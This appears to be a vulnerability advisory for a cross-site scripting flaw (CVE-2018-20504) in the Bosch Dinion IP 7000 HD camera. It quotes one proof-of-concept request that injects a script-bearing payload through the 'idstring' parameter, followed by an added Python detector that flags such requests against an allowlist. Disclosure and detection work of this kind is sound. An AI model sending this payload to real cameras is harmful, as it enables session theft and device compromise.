# BOSCH Dinion IP 7000 HD - Cross-Site Scripting
# Date: 2018-12-26
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Contact: https://pentest.com.tr
# CVE: CVE-2018-20504
# Vendor Homepage: https://www.bosch.com/
# Device Guide: https://resource.boschsecurity.com/documents/DINION_IP_7000_HD_Installation_Manual_enUS_15869520011.pdf
# Model Version: 7000 HD
# Category: Webapps
# Tested on: Windows Server 2012 R2
# Software Description : DINION IP 7000 HD cameras are 1080p30 progressive
# scan CMOS cameras that use the Bosch-designed digital imaging technology.
# Description : Exploiting these issues could allow an attacker to steal cookie-based authentication credentials,
# compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
# Vulnerabilities have been discovered during penetration testing.
# ==================================================================
# PoC:
# The 'idstring' parameter handled by "rcp.xml" contains an XSS vulnerability.
# GET Request : /rcp.xml?command=0x0B89&type=T_WORD&direction=READ&num=1&idstring=sd_card_statuspd9q4%3ca%20xmlns%3aa%3d'http%3a%2f%2fwww.w3.org%2f1999%2fxhtml'%3e%3ca%3abody%20onload%3d'alert(1)'%2f%3e%3c%2fa%3el6mvv&_=1542292897080
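# ==================================================================
# Detection example (added here, not part of the original advisory or any vendor code): a check that flags "rcp.xml" requests whose decoded 'idstring' is not a plain identifier.
# Assumptions: the allowlist pattern, the function names and the sample request targets are constructed for illustration; only the second sample is the request quoted in the PoC above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate idstring values are short plain identifiers such as
# "sd_card_status" (the prefix visible in the advisory's request).
SAFE_IDSTRING = re.compile(r"[A-Za-z0-9_.-]{1,64}")

# Constructed request targets as a reverse proxy in front of the camera
# might log them. The second one is the request quoted in the advisory.
SAMPLE_TARGETS = [
    "/rcp.xml?command=0x0B89&type=T_WORD&direction=READ&num=1"
    "&idstring=sd_card_status&_=1542292897080",
    "/rcp.xml?command=0x0B89&type=T_WORD&direction=READ&num=1"
    "&idstring=sd_card_statuspd9q4%3ca%20xmlns%3aa%3d'http%3a%2f%2fwww.w3.org"
    "%2f1999%2fxhtml'%3e%3ca%3abody%20onload%3d'alert(1)'%2f%3e%3c%2fa%3el6mvv"
    "&_=1542292897080",
    "/index.html?idstring=%3cb%3e",  # other path: outside this rule's scope
]


def rejected_idstrings(target):
    """Return decoded idstring values of an rcp.xml request that fail the allowlist."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/rcp.xml"):
        return []
    params = parse_qs(parts.query, keep_blank_values=True)
    # parse_qs percent-decodes once; anything still containing '%', '<',
    # quotes or whitespace after that is not a plain identifier.
    return [v for v in params.get("idstring", []) if not SAFE_IDSTRING.fullmatch(v)]


def scan(targets):
    """Map each flagged request target to its rejected idstring values."""
    hits = {}
    for target in targets:
        bad = rejected_idstrings(target)
        if bad:
            hits[target] = bad
    return hits


if __name__ == "__main__":
    for target, values in scan(SAMPLE_TARGETS).items():
        print("ALERT rcp.xml idstring rejected:", values)
```

# The same allowlist can be enforced as a blocking rule on a reverse proxy placed in front of the camera's web interface.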